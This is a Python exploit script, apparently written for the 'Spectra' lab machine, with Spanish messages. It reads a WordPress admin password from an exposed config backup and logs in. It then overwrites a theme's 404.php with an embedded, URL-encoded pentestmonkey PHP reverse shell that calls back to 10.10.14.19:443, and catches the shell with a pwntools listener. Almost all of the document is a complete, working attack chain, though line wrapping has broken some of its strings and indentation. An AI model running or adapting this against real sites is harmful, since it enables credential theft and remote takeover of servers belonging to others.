#!

/usr/bin/python3

import requests
import re
import signal
import time
import sys
import pdb
import urllib.parse
import threading

from pwn import *

def def_handler(sig, frame):

print("\n[!] Saliendo...\n")
sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

# Variables globales
login_wordpress_url = "http://spectra.htb/main/wp-login.php"
rce_wordpress_url = "http://spectra.htb/main/wp-
content/themes/twentynineteen/404.php" # RCE
backup_wordpress_config = "http://spectra.htb/testing/wp-config.php.save"
user_wordpress_url = "http://spectra.htb/main/?author=1" # Administrator
file_upload_url = "http://spectra.htb/main/wp-admin/admin-ajax.php"
get_nonce_value = "http://spectra.htb/main/wp-admin/theme-editor.php?
file=404.php&theme=twentynineteen" # nonce
lport = 443

burp = {'http': 'http://127.0.0.1:8080'}

def makeRequest():

s = requests.session()
r = s.get(user_wordpress_url)

username = re.findall(r'class="vcard">(.*?)<', r.text)[0] # Administrator

r = s.get(backup_wordpress_config)

password = re.findall(r"'DB_PASSWORD', '(.*?)'", r.text)[0] # Password

headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36'}

login_data = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'redirect_to': 'http://spectra.htb/main/wp-admin/',
'testcookie': '1'
}

r = s.get(login_wordpress_url)
cookies = dict(r.cookies)

r = s.post(login_wordpress_url, data=login_data, cookies=cookies,

headers=headers)
r = s.get(get_nonce_value)

nonce = re.findall(r'name="nonce" value="(.*?)"', r.text)[0]

filename = "%3C%3Fphp%0A%2F%2F+php-reverse-shell+-
+A+Reverse+Shell+implementation+in+PHP%0A%2F%2F+Copyright+(C)+2007+pentestmonkey
%40pentestmonkey.net%0A%2F%2F%0A%2F
%2F+This+tool+may+be+used+for+legal+purposes+only.++Users+take+full+responsibility
%0A%2F%2F+for+any+actions+performed+using+this+tool.+
+The+author+accepts+no+liability%0A%2F%2F+for+damage+caused+by+this+tool.+
+If+these+terms+are+not+acceptable+to+you%2C+then%0A%2F%2F+do+not+use+this+tool.%0A
%2F%2F%0A%2F%2F+In+all+other+respects+the+GPL+version+2+applies%3A%0A%2F%2F%0A%2F
%2F+This+program+is+free+software%3B+you+can+redistribute+it+and%2For+modify%0A%2F
%2F+it+under+the+terms+of+the+GNU+General+Public+License+version+2+as%0A%2F
%2F+published+by+the+Free+Software+Foundation.%0A%2F%2F%0A%2F
%2F+This+program+is+distributed+in+the+hope+that+it+will+be+useful%2C%0A%2F
%2F+but+WITHOUT+ANY+WARRANTY%3B+without+even+the+implied+warranty+of%0A%2F
%2F+MERCHANTABILITY+or+FITNESS+FOR+A+PARTICULAR+PURPOSE.++See+the%0A%2F
%2F+GNU+General+Public+License+for+more+details.%0A%2F%2F%0A%2F
%2F+You+should+have+received+a+copy+of+the+GNU+General+Public+License+along%0A%2F
%2F+with+this+program%3B+if+not%2C+write+to+the+Free+Software+Foundation%2C+Inc.%2C
%0A%2F%2F+51+Franklin+Street%2C+Fifth+Floor%2C+Boston%2C+MA+02110-1301+USA.%0A%2F
%2F%0A%2F%2F+This+tool+may+be+used+for+legal+purposes+only.+
+Users+take+full+responsibility%0A%2F%2F+for+any+actions+performed+using+this+tool.
++If+these+terms+are+not+acceptable+to%0A%2F%2F+you%2C+then+do+not+use+this+tool.
%0A%2F%2F%0A%2F%2F+You+are+encouraged+to+send+comments
%2C+improvements+or+suggestions+to%0A%2F%2F+me+at+pentestmonkey%40pentestmonkey.net
%0A%2F%2F%0A%2F%2F+Description%0A%2F%2F+-----------%0A%2F
%2F+This+script+will+make+an+outbound+TCP+connection+to+a+hardcoded+IP+and+port.%0A
%2F%2F+The+recipient+will+be+given+a+shell+running+as+the+current+user+
(apache+normally).%0A%2F%2F%0A%2F%2F+Limitations%0A%2F%2F+-----------%0A%2F
%2F+proc_open+and+stream_set_blocking+require+PHP+version+4.3%2B%2C+or+5%2B%0A%2F
%2F+Use+of+stream_select()+on+file+descriptors+returned+by+proc_open()
+will+fail+and+return+FALSE+under+Windows.%0A%2F%2F+Some+compile-
time+options+are+needed+for+daemonisation+(like+pcntl%2C+posix).+
+These+are+rarely+available.%0A%2F%2F%0A%2F%2F+Usage%0A%2F%2F+-----%0A%2F
%2F+See+http%3A%2F%2Fpentestmonkey.net%2Ftools%2Fphp-reverse-
shell+if+you+get+stuck.%0A%0Aset_time_limit+(0)%3B%0A%24VERSION+%3D+%221.0%22%3B%0A
%24ip+%3D+'10.10.14.19'%3B++%2F%2F+CHANGE+THIS%0A%24port+%3D+443%3B+++++++%2F
%2F+CHANGE+THIS%0A%24chunk_size+%3D+1400%3B%0A%24write_a+%3D+null%3B%0A%24error_a+
%3D+null%3B%0A%24shell+%3D+'uname+-a%3B+w%3B+id%3B+%2Fbin%2Fsh+-i'%3B%0A%24daemon+
%3D+0%3B%0A%24debug+%3D+0%3B%0A%0A%2F%2F%0A%2F
%2F+Daemonise+ourself+if+possible+to+avoid+zombies+later%0A%2F%2F%0A%0A%2F
%2F+pcntl_fork+is+hardly+ever+available%2C+but+will+allow+us+to+daemonise%0A%2F
%2F+our+php+process+and+avoid+zombies.++Worth+a+try...%0Aif+
(function_exists('pcntl_fork'))+%7B%0A%09%2F
%2F+Fork+and+have+the+parent+process+exit%0A%09%24pid+%3D+pcntl_fork()%3B%0A%09%0A
%09if+(%24pid+%3D%3D+-1)+%7B%0A%09%09printit(%22ERROR%3A+Can't+fork%22)%3B%0A
%09%09exit(1)%3B%0A%09%7D%0A%09%0A%09if+(%24pid)+%7B%0A%09%09exit(0)%3B++%2F
%2F+Parent+exits%0A%09%7D%0A%0A%09%2F%2F+Make+the+current+process+a+session+leader
%0A%09%2F%2F+Will+only+succeed+if+we+forked%0A%09if+(posix_setsid()+%3D%3D+-1)+%7B
%0A%09%09printit(%22Error%3A+Can't+setsid()%22)%3B%0A%09%09exit(1)%3B%0A%09%7D%0A
%0A%09%24daemon+%3D+1%3B%0A%7D+else+%7B%0A%09printit(%22WARNING
%3A+Failed+to+daemonise.++This+is+quite+common+and+not+fatal.%22)%3B%0A%7D%0A%0A%2F
%2F+Change+to+a+safe+directory%0Achdir(%22%2F%22)%3B%0A%0A%2F
%2F+Remove+any+umask+we+inherited%0Aumask(0)%3B%0A%0A%2F%2F%0A%2F
%2F+Do+the+reverse+shell...%0A%2F%2F%0A%0A%2F%2F+Open+reverse+connection%0A%24sock+
%3D+fsockopen(%24ip%2C+%24port%2C+%24errno%2C+%24errstr%2C+30)%3B%0Aif+(!%24sock)+
%7B%0A%09printit(%22%24errstr+(%24errno)%22)%3B%0A%09exit(1)%3B%0A%7D%0A%0A%2F
%2F+Spawn+shell+process%0A%24descriptorspec+%3D+array(%0A+++0+%3D%3E+array(%22pipe
%22%2C+%22r%22)%2C++%2F%2F+stdin+is+a+pipe+that+the+child+will+read+from%0A+++1+%3D
%3E+array(%22pipe%22%2C+%22w%22)%2C++%2F
%2F+stdout+is+a+pipe+that+the+child+will+write+to%0A+++2+%3D%3E+array(%22pipe
%22%2C+%22w%22)+++%2F%2F+stderr+is+a+pipe+that+the+child+will+write+to%0A)%3B%0A%0A
%24process+%3D+proc_open(%24shell%2C+%24descriptorspec%2C+%24pipes)%3B%0A%0Aif+(!
is_resource(%24process))+%7B%0A%09printit(%22ERROR%3A+Can't+spawn+shell%22)%3B%0A
%09exit(1)%3B%0A%7D%0A%0A%2F%2F+Set+everything+to+non-blocking%0A%2F%2F+Reason
%3A+Occsionally+reads+will+block%2C+even+though+stream_select+tells+us+they+won't
%0Astream_set_blocking(%24pipes%5B0%5D%2C+0)%3B%0Astream_set_blocking(%24pipes
%5B1%5D%2C+0)%3B%0Astream_set_blocking(%24pipes%5B2%5D%2C+0)%3B
%0Astream_set_blocking(%24sock%2C+0)%3B%0A
%0Aprintit(%22Successfully+opened+reverse+shell+to+%24ip%3A%24port%22)%3B%0A
%0Awhile+(1)+%7B%0A%09%2F%2F+Check+for+end+of+TCP+connection%0A%09if+
(feof(%24sock))+%7B%0A%09%09printit(%22ERROR%3A+Shell+connection+terminated%22)%3B
%0A%09%09break%3B%0A%09%7D%0A%0A%09%2F%2F+Check+for+end+of+STDOUT%0A%09if+
(feof(%24pipes%5B1%5D))+%7B%0A%09%09printit(%22ERROR%3A+Shell+process+terminated
%22)%3B%0A%09%09break%3B%0A%09%7D%0A%0A%09%2F%2F+Wait+until+a+command+is+end+down+
%24sock%2C+or+some%0A%09%2F%2F+command+output+is+available+on+STDOUT+or+STDERR%0A
%09%24read_a+%3D+array(%24sock%2C+%24pipes%5B1%5D%2C+%24pipes%5B2%5D)%3B%0A
%09%24num_changed_sockets+%3D+stream_select(%24read_a%2C+%24write_a%2C+%24error_a
%2C+null)%3B%0A%0A%09%2F%2F+If+we+can+read+from+the+TCP+socket%2C+send%0A%09%2F
%2F+data+to+process's+STDIN%0A%09if+(in_array(%24sock%2C+%24read_a))+%7B%0A
%09%09if+(%24debug)+printit(%22SOCK+READ%22)%3B%0A%09%09%24input+%3D+fread(%24sock
%2C+%24chunk_size)%3B%0A%09%09if+(%24debug)+printit(%22SOCK%3A+%24input%22)%3B%0A
%09%09fwrite(%24pipes%5B0%5D%2C+%24input)%3B%0A%09%7D%0A%0A%09%2F
%2F+If+we+can+read+from+the+process's+STDOUT%0A%09%2F
%2F+send+data+down+tcp+connection%0A%09if+(in_array(%24pipes%5B1%5D%2C+%24read_a))+
%7B%0A%09%09if+(%24debug)+printit(%22STDOUT+READ%22)%3B%0A%09%09%24input+
%3D+fread(%24pipes%5B1%5D%2C+%24chunk_size)%3B%0A%09%09if+(%24debug)
+printit(%22STDOUT%3A+%24input%22)%3B%0A%09%09fwrite(%24sock%2C+%24input)%3B%0A
%09%7D%0A%0A%09%2F%2F+If+we+can+read+from+the+process's+STDERR%0A%09%2F
%2F+send+data+down+tcp+connection%0A%09if+(in_array(%24pipes%5B2%5D%2C+%24read_a))+
%7B%0A%09%09if+(%24debug)+printit(%22STDERR+READ%22)%3B%0A%09%09%24input+
%3D+fread(%24pipes%5B2%5D%2C+%24chunk_size)%3B%0A%09%09if+(%24debug)
+printit(%22STDERR%3A+%24input%22)%3B%0A%09%09fwrite(%24sock%2C+%24input)%3B%0A
%09%7D%0A%7D%0A%0Afclose(%24sock)%3B%0Afclose(%24pipes%5B0%5D)%3B%0Afclose(%24pipes
%5B1%5D)%3B%0Afclose(%24pipes%5B2%5D)%3B%0Aproc_close(%24process)%3B%0A%0A%2F
%2F+Like+print%2C+but+does+nothing+if+we've+daemonised+ourself%0A%2F%2F+
(I+can't+figure+out+how+to+redirect+STDOUT+like+a+proper+daemon)
%0Afunction+printit+(%24string)+%7B%0A%09if+(!%24daemon)+%7B%0A%09%09print+
%22%24string%5Cn%22%3B%0A%09%7D%0A%7D%0A%0A%3F%3E"

filename = urllib.parse.unquote(filename).replace('+', ' ')

data_file_to_upload = {
'nonce': nonce,
'_wp_http_referer': '/main/wp-admin/theme-editor.php?
file=404.php&theme=twentynineteen',
'newcontent': filename,
'action': 'edit-theme-plugin-file',
'file': '404.php',
'theme': 'twentynineteen',
'docs-list': ''
}

# File upload
r = s.post(file_upload_url, data=data_file_to_upload)
 # Remote Command Execution
r = s.get(rce_wordpress_url)

if __name__ == '__main__':

try:
threading.Thread(target=makeRequest, args=()).start()
except Exception as e:
log.error(str(e))

shell = listen(lport, timeout=20).wait_for_connection()

shell.interactive()